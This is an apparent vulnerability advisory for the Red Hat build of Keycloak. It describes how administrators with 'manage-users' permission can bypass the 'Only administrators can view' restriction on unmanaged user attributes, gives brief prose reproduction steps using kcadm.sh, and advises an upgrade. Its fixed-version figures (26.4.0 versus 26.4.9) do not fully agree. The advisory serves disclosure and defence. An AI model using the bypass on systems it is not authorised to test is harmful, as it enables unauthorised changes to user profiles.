Red Hat build of Keycloak
Moderate fix1 remedy
cpe:2.3:a:redhat:build_of_keycloak:*:*:*:*:*:*:*
Moderate fix1 remedy
- < 26.4.0
Keycloak Unmanaged Attribute Modification Vulnerability for Administrators
Vulnerability
Patched
A vulnerability exists in Keycloak that allows administrators with 'manage-users' permission to bypass the 'Only administrators can view' setting for unmanaged attributes. This flaw enables unauthorized modifications to user profiles, even when the system is configured to restrict such changes. The issue arises in Keycloak versions prior to 26.4.0.
Impact
Exploitation of this vulnerability allows for unauthorized changes to user profiles by administrators, potentially leading to misuse of user attributes or roles.
Reproduction
To reproduce this vulnerability, create a new realm and set the unmanaged attributes to 'Only administrators can view'. Then, use the Keycloak Admin Command Line Interface (kcadm.sh) to update a user attribute. The change will be applied successfully, despite the restriction, indicating that the vulnerability exists.
Remediation
Users can upgrade to the Red Hat build of Keycloak 26.4.9, which addresses this vulnerability.
Added: Feb 27, 2026, 8:28 AM
Updated: Feb 27, 2026, 2:52 PM
Vulnerability Rating
Custom Algorithm
spread
5.2impact
0.6exploitability
6.3remediation
7.7relevance
3.3threat
6.4urgency
2.9incentive
0.0Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.